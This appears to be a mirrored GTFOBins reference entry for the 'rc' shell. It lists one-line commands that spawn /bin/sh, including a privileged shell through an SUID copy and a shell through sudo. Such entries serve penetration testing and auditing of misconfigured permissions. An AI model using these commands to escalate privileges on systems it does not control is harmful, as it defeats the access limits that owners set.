1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-03-13 02:58:09 +01:00

10 lines
138 B
Markdown
Raw Normal View History

---
functions:
shell:
- code: rc -c '/bin/sh'
suid:
- code: ./rc -c '/bin/sh -p'
sudo:
- code: sudo rc -c '/bin/sh'
---